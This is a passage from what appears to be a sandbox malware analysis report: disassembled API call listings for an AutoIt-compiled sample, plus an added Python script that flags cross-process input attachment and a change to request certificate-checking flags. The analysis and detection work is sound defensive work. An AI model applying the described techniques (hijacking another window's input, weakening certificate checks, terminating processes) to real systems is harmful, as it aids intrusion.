• Opcode Fuzzy Hash: f6b5e680437ebd5fa6c63dc81d4f47c1ae2923d4b0a218a91ec9d47cd70a4f90
• Instruction Fuzzy Hash: FC91D731601B05ABCB09DFA0D4A2BEEFBB8BF04300F55852AD449A7291DF316999CF91
APIs
• SetWindowLongW.USER32(?,000000EB), ref: 002B2EAE
  • Part of subcall function 002B1DB3: GetClientRect.USER32(?,?), ref: 002B1DDC
  • Part of subcall function 002B1DB3: GetWindowRect.USER32(?,?), ref: 002B1E1D
  • Part of subcall function 002B1DB3: ScreenToClient.USER32(?,?), ref: 002B1E45
• GetDC.USER32 ref: 002ECD32
• SendMessageW.USER32(?,00000031,00000000,00000000), ref: 002ECD45
• SelectObject.GDI32(00000000,00000000), ref: 002ECD53
• SelectObject.GDI32(00000000,00000000), ref: 002ECD68
• ReleaseDC.USER32(?,00000000), ref: 002ECD70
• MoveWindow.USER32(?,?,?,?,?,?,?,00000031,00000000,00000000), ref: 002ECDFB
Strings
Memory Dump Source
• Source File: 00000000.00000002.2093337129.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
• Associated: 00000000.00000002.2093280237.00000000002B0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2093420472.000000000033F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2093420472.0000000000364000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2093476420.000000000036E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2093514337.0000000000377000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_2b0000_6BRa130JDj.jbxd
Similarity
• API ID: Window$ClientObjectRectSelect$LongMessageMoveReleaseScreenSend
• String ID: U
• API String ID: 4009187628-3372436214
• Opcode ID: 2030e07594f0dfb92c8207acd9032d45f65d055afb32c6a567a90f533436231c
• Instruction ID: cf8da4885c2ba8a002624a45993df37917d2f4ac0fe7d904109ad7e8c1ac684a
• Opcode Fuzzy Hash: 2030e07594f0dfb92c8207acd9032d45f65d055afb32c6a567a90f533436231c
• Instruction Fuzzy Hash: 2771F631910246DFCF258FA5CC80AEA3BB5FF48350F64426AED555A265C731DCA2DF60
APIs
• InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 00321A50
• HttpOpenRequestW.WININET(00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 00321A7C
• InternetQueryOptionW.WININET(00000000,0000001F,00000000,?), ref: 00321ABE
• InternetSetOptionW.WININET(00000000,0000001F,00000100,00000004), ref: 00321AD3
• HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00321AE0
• HttpQueryInfoW.WININET(00000000,00000005,?,?,00000000), ref: 00321B10
• InternetCloseHandle.WININET(00000000), ref: 00321B57
  • Part of subcall function 00322483: GetLastError.KERNEL32(?,?,00321817,00000000,00000000,00000001), ref: 00322498
  • Part of subcall function 00322483: SetEvent.KERNEL32(?,?,00321817,00000000,00000000,00000001), ref: 003224AD
Strings
Memory Dump Source
• Source File: 00000000.00000002.2093337129.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
• Associated: 00000000.00000002.2093280237.00000000002B0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2093420472.000000000033F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2093420472.0000000000364000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2093476420.000000000036E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2093514337.0000000000377000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_2b0000_6BRa130JDj.jbxd
Similarity
• API ID: Internet$Http$OptionQueryRequest$CloseConnectErrorEventHandleInfoLastOpenSend
• String ID:
• API String ID: 2603140658-3916222277
• Opcode ID: 77b9f3001280a3e4d408d9135faefd1a9a4db057140dc6f6882e963a52f5e600
• Instruction ID: 883c74e4ad61b9635a0ea0c57270a8aab88d50dddcb8ffb658ed55938d63d6dc
• Opcode Fuzzy Hash: 77b9f3001280a3e4d408d9135faefd1a9a4db057140dc6f6882e963a52f5e600
• Instruction Fuzzy Hash: 79416EB1901228BFEB139F50DD89FBB7BACEF18354F00412AF9059A151E7749E449BA0
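Added example, not part of the Joe Sandbox report and not code from the sample: a Python triage script that parses the function blocks in the format used above and flags two of the sequences worth a second look, the AttachThreadInput block at ref 00311204 (GetForegroundWindow, GetWindowThreadProcessId, then AttachThreadInput with fAttach=1 followed later by fAttach=0, i.e. the calling thread temporarily shares the foreground window's input queue, which is how a process gains focus control and keyboard state of another process's window) and the WinINet block at ref 00321A50 (InternetQueryOptionW/InternetSetOptionW with option 0x1F, which is INTERNET_OPTION_SECURITY_FLAGS in wininet.h, on the request handle before HttpSendRequestW, i.e. the certificate-checking policy of the request is rewritten). The sample input is the two blocks copied from this page with whitespace trimmed; the signature heuristics are this example's own, and the value actually written to the security flags at ref 00321AD3 cannot be read from the listing (the third argument is a buffer pointer), so the finding only asks for it to be confirmed in a debugger.

```python
"""Parse Joe Sandbox IDA-plugin function blocks and flag known API sequences.

Added example for this report, not Joe Sandbox or the sample's code. Input is
the per-function listing format shown on the page (APIs / Similarity bullets);
the signature heuristics are this example's own, not report fields.
"""
import re
from dataclasses import dataclass, field
from typing import Optional

INTERNET_OPTION_SECURITY_FLAGS = 0x1F  # wininet.h; the option id seen at ref 00321AD3

# "• Name.MODULE(arg,arg,...), ref: ADDR"; parens are optional in the report, and
# calls inside a sub-function are prefixed "Part of subcall function ADDR:".
API_RE = re.compile(
    r"^\s*•\s*(?:Part of subcall function (?P<sub>[0-9A-Fa-f]+):\s*)?"
    r"(?P<name>\w+)\.(?P<module>\w+)"
    r"(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)\s*$")
META_RE = re.compile(
    r"^\s*•\s*(?P<key>API ID|String ID|API String ID|Opcode ID|Instruction ID|"
    r"Opcode Fuzzy Hash|Instruction Fuzzy Hash|Source File):\s*(?P<val>.*?)\s*$")


@dataclass
class Call:
    name: str
    module: str
    args: list              # raw stack values as printed; '?' means unresolved
    ref: str                # call-site address in the dump
    subcall: Optional[str]  # callee address when the call sits in a sub-function


@dataclass
class Func:
    calls: list = field(default_factory=list)
    meta: dict = field(default_factory=dict)
    findings: list = field(default_factory=list)


def parse_blocks(text: str) -> list:
    """One Func per 'APIs' heading; bullets before the first heading are ignored."""
    funcs, cur = [], None
    for line in text.splitlines():
        if line.strip() == "APIs":
            cur = Func()
            funcs.append(cur)
        elif cur is not None:
            m = API_RE.match(line)
            if m:
                args = [] if m["args"] is None else [a.strip() for a in m["args"].split(",")]
                cur.calls.append(Call(m["name"], m["module"], args, m["ref"], m["sub"]))
                continue
            m = META_RE.match(line)
            if m:
                cur.meta[m["key"]] = m["val"]
    return funcs


def _arg_int(call: Call, i: int) -> Optional[int]:
    """Argument i as an integer, or None when absent or printed as '?'."""
    if i >= len(call.args) or not re.fullmatch(r"[0-9A-Fa-f]+", call.args[i]):
        return None
    return int(call.args[i], 16)


def sig_attach_thread_input(f: Func) -> Optional[str]:
    """Foreground thread resolved, then AttachThreadInput(.., TRUE) and later (.., FALSE)."""
    names = {c.name for c in f.calls}
    if not {"GetForegroundWindow", "GetWindowThreadProcessId", "AttachThreadInput"} <= names:
        return None
    attach_flags = {_arg_int(c, 2) for c in f.calls if c.name == "AttachThreadInput"}
    if {1, 0} <= attach_flags:
        return ("AttachThreadInput attach/detach around the foreground window's thread: "
                "cross-process focus and keyboard-state access")
    return None


def sig_wininet_security_flags(f: Func) -> Optional[str]:
    """INTERNET_OPTION_SECURITY_FLAGS rewritten on the request handle before it is sent."""
    if not any(c.name == "HttpSendRequestW" for c in f.calls):
        return None
    sets = [c for c in f.calls if c.name == "InternetSetOptionW"
            and _arg_int(c, 1) == INTERNET_OPTION_SECURITY_FLAGS]
    if not sets:
        return None
    return ("InternetSetOptionW(INTERNET_OPTION_SECURITY_FLAGS) at ref %s before HttpSendRequestW: "
            "certificate-checking policy changed on the request handle; confirm the flag value"
            % sets[0].ref)


SIGNATURES = [sig_attach_thread_input, sig_wininet_security_flags]


def analyse(text: str) -> list:
    funcs = parse_blocks(text)
    for f in funcs:
        f.findings = [hit for hit in (sig(f) for sig in SIGNATURES) if hit]
    return funcs


# Constructed input: the two blocks copied from this report, whitespace trimmed.
SAMPLE = """\
APIs
• GetCurrentThreadId.KERNEL32 ref: 003111F0
• GetForegroundWindow.USER32(00000000,?,?,?,?,?,00310268,?,00000001), ref: 00311204
• GetWindowThreadProcessId.USER32(00000000), ref: 0031120B
• AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,00310268,?,00000001), ref: 0031121A
• GetWindowThreadProcessId.USER32(?,00000000), ref: 0031122C
• AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,00310268,?,00000001), ref: 00311245
• AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,00310268,?,00000001), ref: 00311257
• AttachThreadInput.USER32(00000000,00000000,?,?,?,?,?,00310268,?,00000001), ref: 0031129C
• AttachThreadInput.USER32(00000000,00000000,00000000,?,?,?,?,?,00310268,?,00000001), ref: 003112B1
• AttachThreadInput.USER32(00000000,00000000,00000000,?,?,?,?,?,00310268,?,00000001), ref: 003112BC
Similarity
• API ID: Thread$AttachInput$Window$Process$CurrentForeground
• String ID:
• Instruction Fuzzy Hash: DE31F075A00A08BFDB279F50EC8AFEA37ADEB58311F114525FE08C61A0D3B09DC18B60
APIs
• InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 00321A50
• HttpOpenRequestW.WININET(00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 00321A7C
• InternetQueryOptionW.WININET(00000000,0000001F,00000000,?), ref: 00321ABE
• InternetSetOptionW.WININET(00000000,0000001F,00000100,00000004), ref: 00321AD3
• HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00321AE0
• HttpQueryInfoW.WININET(00000000,00000005,?,?,00000000), ref: 00321B10
• InternetCloseHandle.WININET(00000000), ref: 00321B57
  • Part of subcall function 00322483: GetLastError.KERNEL32(?,?,00321817,00000000,00000000,00000001), ref: 00322498
  • Part of subcall function 00322483: SetEvent.KERNEL32(?,?,00321817,00000000,00000000,00000001), ref: 003224AD
Similarity
• API ID: Internet$Http$OptionQueryRequest$CloseConnectErrorEventHandleInfoLastOpenSend
• Instruction Fuzzy Hash: 79416EB1901228BFEB139F50DD89FBB7BACEF18354F00412AF9059A151E7749E449BA0
"""

if __name__ == "__main__":
    for f in analyse(SAMPLE):
        print(f.meta.get("Instruction Fuzzy Hash", "?")[:16], len(f.calls), "calls", f.findings)
```

Feed it the whole function listing to get one finding line per block; the Instruction Fuzzy Hash is kept in `meta` so a hit can be pivoted to the same function in other dumps. One caveat when reading hits on this report: the sample is flagged as a compiled AutoIt script, and the blocks around these addresses (the FOR..IN loop messages, the CLASSNN/REGEXPCLASS control keys, the "close all" MCI string) are the AutoIt runtime's own routines, so a hit here says what the interpreter can do, not necessarily what this script does; the behaviour evidence is in the report's dynamic sections.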
APIs
• GetModuleFileNameW.KERNEL32(?,?,00000104,?,0033F910), ref: 00328D28
• FreeLibrary.KERNEL32(00000000,00000001,00000000,?,0033F910), ref: 00328D5C
• QueryPathOfRegTypeLib.OLEAUT32(?,?,?,?,?), ref: 00328ED6
• SysFreeString.OLEAUT32(?), ref: 00328F00
Memory Dump Source
• Source File: 00000000.00000002.2093337129.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
• Associated: 00000000.00000002.2093280237.00000000002B0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2093420472.000000000033F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2093420472.0000000000364000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2093476420.000000000036E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2093514337.0000000000377000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_2b0000_6BRa130JDj.jbxd
Similarity
• API ID: Free$FileLibraryModuleNamePathQueryStringType
• String ID:
• API String ID: 560350794-0
• Opcode ID: b6e2d7178d8190b014c92381766e83b568398cde4272b561076bb230b2105af4
• Instruction ID: 83d6137d0f8b94b4d4a5694b5f1b0d5da6766002ad8f4deddc808e9fa206995a
• Opcode Fuzzy Hash: b6e2d7178d8190b014c92381766e83b568398cde4272b561076bb230b2105af4
• Instruction Fuzzy Hash: 7DF13871A00229EFCF05DF94D884EAEB7B9FF49314F118499F905AB251DB31AE46CB90
APIs
• _memset.LIBCMT ref: 0032F6B5
• GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 0032F848
• GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 0032F86C
• GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 0032F8AC
• GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 0032F8CE
• CreateProcessW.KERNEL32(00000000,?,00000000,00000000,?,?,00000000,?,?,?), ref: 0032FA4A
• GetLastError.KERNEL32(00000000,00000001,00000000), ref: 0032FA7C
• CloseHandle.KERNEL32(?), ref: 0032FAAB
• CloseHandle.KERNEL32(?), ref: 0032FB22
Memory Dump Source
• Source File: 00000000.00000002.2093337129.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
• Associated: 00000000.00000002.2093280237.00000000002B0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2093420472.000000000033F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2093420472.0000000000364000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2093476420.000000000036E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2093514337.0000000000377000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_2b0000_6BRa130JDj.jbxd
Similarity
• API ID: Directory$CloseCurrentHandleSystem$CreateErrorLastProcess_memset
• String ID:
• API String ID: 4090791747-0
APIs
  • Part of subcall function 0031466E: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,00313697,?), ref: 0031468B
  • Part of subcall function 0031466E: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,00313697,?), ref: 003146A4
  • Part of subcall function 00314A31: GetFileAttributesW.KERNEL32(?,0031370B), ref: 00314A32
• lstrcmpiW.KERNEL32(?,?), ref: 00314D40
• _wcscmp.LIBCMT ref: 00314D5A
• MoveFileW.KERNEL32(?,?), ref: 00314D75
Similarity
• API ID: FileFullNamePath$AttributesMove_wcscmplstrcmpi
• String ID:
• API String ID: 793581249-0
APIs
• InvalidateRect.USER32(?,00000000,00000001,?,00000001), ref: 003386FF
Similarity
• API ID: InvalidateRect
• String ID:
• API String ID: 634782764-0
APIs
• LoadImageW.USER32(00000000,?,00000001,00000010,00000010,00000010), ref: 002EC2F7
• ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 002EC319
• LoadImageW.USER32(00000000,?,00000001,00000000,00000000,00000050), ref: 002EC331
• ExtractIconExW.SHELL32(?,00000000,?,00000000,00000001), ref: 002EC34F
• SendMessageW.USER32(00000000,00000080,00000000,00000000), ref: 002EC370
• DestroyIcon.USER32(00000000), ref: 002EC37F
• SendMessageW.USER32(00000000,00000080,00000001,00000000), ref: 002EC39C
• DestroyIcon.USER32(?), ref: 002EC3AB
  • Part of subcall function 0033A4AF: DeleteObject.GDI32(00000000), ref: 0033A4E8
Similarity
• API ID: Icon$DestroyExtractImageLoadMessageSend$DeleteObject
• String ID:
• API String ID: 2819616528-0
APIs
  • Part of subcall function 0030A82C: GetWindowThreadProcessId.USER32(?,00000000), ref: 0030A84C
  • Part of subcall function 0030A82C: GetCurrentThreadId.KERNEL32 ref: 0030A853
  • Part of subcall function 0030A82C: AttachThreadInput.USER32(00000000,?,00309683,?,00000001), ref: 0030A85A
• MapVirtualKeyW.USER32(00000025,00000000), ref: 0030968E
• PostMessageW.USER32(?,00000100,00000025,00000000), ref: 003096AB
• Sleep.KERNEL32(00000000,?,00000100,00000025,00000000,?,00000001), ref: 003096AE
• MapVirtualKeyW.USER32(00000025,00000000), ref: 003096B7
• PostMessageW.USER32(?,00000100,00000027,00000000), ref: 003096D5
• Sleep.KERNEL32(00000000,?,00000100,00000027,00000000,?,00000001), ref: 003096D8
• MapVirtualKeyW.USER32(00000025,00000000), ref: 003096E1
• PostMessageW.USER32(?,00000101,00000027,00000000), ref: 003096F8
• Sleep.KERNEL32(00000000,?,00000100,00000027,00000000,?,00000001), ref: 003096FB
Similarity
• API ID: MessagePostSleepThreadVirtual$AttachCurrentInputProcessWindow
• String ID:
• API String ID: 2014098862-0
APIs
• GetProcessHeap.KERNEL32(00000008,0000000C,00000000,00000000,?,0030853C,00000B00,?,?), ref: 0030892A
• HeapAlloc.KERNEL32(00000000,?,0030853C,00000B00,?,?), ref: 00308931
• GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002,?,0030853C,00000B00,?,?), ref: 00308946
• GetCurrentProcess.KERNEL32(?,00000000,?,0030853C,00000B00,?,?), ref: 0030894E
• DuplicateHandle.KERNEL32(00000000,?,0030853C,00000B00,?,?), ref: 00308951
• GetCurrentProcess.KERNEL32(00000008,00000000,00000000,00000002,?,0030853C,00000B00,?,?), ref: 00308961
• GetCurrentProcess.KERNEL32(0030853C,00000000,?,0030853C,00000B00,?,?), ref: 00308969
• DuplicateHandle.KERNEL32(00000000,?,0030853C,00000B00,?,?), ref: 0030896C
• CreateThread.KERNEL32(00000000,00000000,00308992,00000000,00000000,00000000), ref: 00308986
Similarity
• API ID: Process$Current$DuplicateHandleHeap$AllocCreateThread
• String ID:
• API String ID: 1957940570-0
Strings
Similarity
• API ID:
• String ID: NULL Pointer assignment$Not an Object type
• API String ID: 0-572801152
                                                                                                                    APIs
                                                                                                                      • Part of subcall function 0030710A: CLSIDFromProgID.OLE32(?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00307044,80070057,?,?,?,00307455), ref: 00307127
                                                                                                                      • Part of subcall function 0030710A: ProgIDFromCLSID.OLE32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00307044,80070057,?,?), ref: 00307142
                                                                                                                      • Part of subcall function 0030710A: lstrcmpiW.KERNEL32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00307044,80070057,?,?), ref: 00307150
                                                                                                                      • Part of subcall function 0030710A: CoTaskMemFree.OLE32(00000000,?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00307044,80070057,?), ref: 00307160
                                                                                                                    • CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000002,00000003,00000000,00000000,00000000,?,?,?), ref: 00329806
                                                                                                                    • _memset.LIBCMT ref: 00329813
                                                                                                                    • _memset.LIBCMT ref: 00329956
                                                                                                                    • CoCreateInstanceEx.OLE32(?,00000000,00000015,?,00000001,00000000), ref: 00329982
                                                                                                                    • CoTaskMemFree.OLE32(?), ref: 0032998D
                                                                                                                    Strings
                                                                                                                    • NULL Pointer assignment, xrefs: 003299DB
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2093337129.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                                                                                                                     • Associated: 00000000.00000002.2093280237.00000000002B0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.2093420472.000000000033F000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.2093420472.0000000000364000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.2093476420.000000000036E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.2093514337.0000000000377000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_2b0000_6BRa130JDj.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: FreeFromProgTask_memset$CreateInitializeInstanceSecuritylstrcmpi
                                                                                                                    • String ID: NULL Pointer assignment
                                                                                                                    • API String ID: 1300414916-2785691316
                                                                                                                    • Opcode ID: be6a25a72e4b6b59a2c73655b253ed31e1fd3c76c277789bfb3e4f661f492d01
                                                                                                                    • Instruction ID: b1facc3cd3f6ec63f05f0aa0dd228311f63c6aafb8b4ca0c13d7827b9096fad7
                                                                                                                    • Opcode Fuzzy Hash: be6a25a72e4b6b59a2c73655b253ed31e1fd3c76c277789bfb3e4f661f492d01
                                                                                                                    • Instruction Fuzzy Hash: 11913871D00229EBDB11DFA5DC81FDEBBB9AF08350F10415AF419AB291DB719A44CFA0
                                                                                                                    APIs
                                                                                                                    • SendMessageW.USER32(00000000,00001036,00000010,00000010), ref: 00336E24
                                                                                                                    • SendMessageW.USER32(?,00001036,00000000,?), ref: 00336E38
                                                                                                                    • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013), ref: 00336E52
                                                                                                                    • _wcscat.LIBCMT ref: 00336EAD
                                                                                                                    • SendMessageW.USER32(?,00001057,00000000,?), ref: 00336EC4
                                                                                                                    • SendMessageW.USER32(?,00001061,?,0000000F), ref: 00336EF2
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2093337129.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                                                                                                                     • Associated: 00000000.00000002.2093280237.00000000002B0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.2093420472.000000000033F000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.2093420472.0000000000364000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.2093476420.000000000036E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.2093514337.0000000000377000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_2b0000_6BRa130JDj.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: MessageSend$Window_wcscat
                                                                                                                    • String ID: SysListView32
                                                                                                                    • API String ID: 307300125-78025650
                                                                                                                    • Opcode ID: 66a6d2f1af71cd40cde2bcbd7f1cbc2037ec1dd38a0781cf5a17862658567337
                                                                                                                    • Instruction ID: 72b20adb1f0e3c60d4b6e5672a5ef2ea0d528f827effa745f94e33b2b52866f7
                                                                                                                    • Opcode Fuzzy Hash: 66a6d2f1af71cd40cde2bcbd7f1cbc2037ec1dd38a0781cf5a17862658567337
                                                                                                                    • Instruction Fuzzy Hash: A1419371A00348FFDB229F64CC86BEEB7A9EF08350F11452AF544E7191D6719D948B60
                                                                                                                    APIs
                                                                                                                      • Part of subcall function 00313C55: CreateToolhelp32Snapshot.KERNEL32 ref: 00313C7A
                                                                                                                      • Part of subcall function 00313C55: Process32FirstW.KERNEL32(00000000,?), ref: 00313C88
                                                                                                                      • Part of subcall function 00313C55: CloseHandle.KERNEL32(00000000), ref: 00313D52
                                                                                                                    • OpenProcess.KERNEL32(00000001,00000000,?), ref: 0032E9A4
                                                                                                                    • GetLastError.KERNEL32 ref: 0032E9B7
                                                                                                                    • OpenProcess.KERNEL32(00000001,00000000,?), ref: 0032E9E6
                                                                                                                    • TerminateProcess.KERNEL32(00000000,00000000), ref: 0032EA63
                                                                                                                    • GetLastError.KERNEL32(00000000), ref: 0032EA6E
                                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 0032EAA3
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2093337129.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                                                                                                                     • Associated: 00000000.00000002.2093280237.00000000002B0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.2093420472.000000000033F000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.2093420472.0000000000364000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.2093476420.000000000036E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.2093514337.0000000000377000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_2b0000_6BRa130JDj.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Process$CloseErrorHandleLastOpen$CreateFirstProcess32SnapshotTerminateToolhelp32
                                                                                                                    • String ID: SeDebugPrivilege
                                                                                                                    • API String ID: 2533919879-2896544425
                                                                                                                    • Opcode ID: 8e5e94fa3ff70d58bf203973c97935c66a187c6ebf7df2db68fdd2a6ad385579
                                                                                                                    • Instruction ID: f3f05527eaccd343d1aca401351691c115173940d21925fdb0848110bb92c4b0
                                                                                                                    • Opcode Fuzzy Hash: 8e5e94fa3ff70d58bf203973c97935c66a187c6ebf7df2db68fdd2a6ad385579
                                                                                                                    • Instruction Fuzzy Hash: 5241A9316002119FDB16EF24DCA6FAEBBA9AF45314F188418F9469F2D2CB74AC54CF91
                                                                                                                    APIs
                                                                                                                    • LoadIconW.USER32(00000000,00007F03), ref: 00313033
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2093337129.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                                                                                                                     • Associated: 00000000.00000002.2093280237.00000000002B0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.2093420472.000000000033F000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.2093420472.0000000000364000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.2093476420.000000000036E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.2093514337.0000000000377000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_2b0000_6BRa130JDj.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: IconLoad
                                                                                                                    • String ID: blank$info$question$stop$warning
                                                                                                                    • API String ID: 2457776203-404129466
                                                                                                                    • Opcode ID: 23feb4e292f65ec1716626b8f86b62ef3591a458829ee1595052a825ac7b7bbe
                                                                                                                    • Instruction ID: 9c0ef227354540eca23732fd93f746181adcfbfa0b4b48f2814c67fdd8fd7bb2
                                                                                                                    • Opcode Fuzzy Hash: 23feb4e292f65ec1716626b8f86b62ef3591a458829ee1595052a825ac7b7bbe
                                                                                                                    • Instruction Fuzzy Hash: 51110831648346BED71B9B14DC42CEB6BDC9F2D360F10402AFA02662C1DB616F8456A1
                                                                                                                    APIs
                                                                                                                    • GetModuleHandleW.KERNEL32(00000000,?,?,00000100,00000000), ref: 00314312
                                                                                                                    • LoadStringW.USER32(00000000), ref: 00314319
                                                                                                                    • GetModuleHandleW.KERNEL32(00000000,00001389,?,00000100), ref: 0031432F
                                                                                                                    • LoadStringW.USER32(00000000), ref: 00314336
                                                                                                                    • _wprintf.LIBCMT ref: 0031435C
                                                                                                                    • MessageBoxW.USER32(00000000,?,?,00011010), ref: 0031437A
                                                                                                                    Strings
                                                                                                                    • %s (%d) : ==> %s: %s %s, xrefs: 00314357
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2093337129.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                                                                                                                     • Associated: 00000000.00000002.2093280237.00000000002B0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.2093420472.000000000033F000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.2093420472.0000000000364000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.2093476420.000000000036E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.2093514337.0000000000377000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_2b0000_6BRa130JDj.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: HandleLoadModuleString$Message_wprintf
                                                                                                                    • String ID: %s (%d) : ==> %s: %s %s
                                                                                                                    • API String ID: 3648134473-3128320259
                                                                                                                    • Opcode ID: 55f55bf703fc7b18bf884cc7ec8cf5fcb760378d4886942a9ab552fa3237836e
                                                                                                                    • Instruction ID: 4275ab0999c65395d94086ccd8711e79fabf67d0eac28a993045834df49803e8
                                                                                                                    • Opcode Fuzzy Hash: 55f55bf703fc7b18bf884cc7ec8cf5fcb760378d4886942a9ab552fa3237836e
                                                                                                                    • Instruction Fuzzy Hash: B10162F6D00208BFE752ABA0DDC9FE6776CDB08301F4005A2B749E2051EB745E954B71
                                                                                                                    APIs
                                                                                                                      • Part of subcall function 002B2612: GetWindowLongW.USER32(?,000000EB), ref: 002B2623
                                                                                                                    • GetSystemMetrics.USER32(0000000F), ref: 0033D47C
                                                                                                                    • GetSystemMetrics.USER32(0000000F), ref: 0033D49C
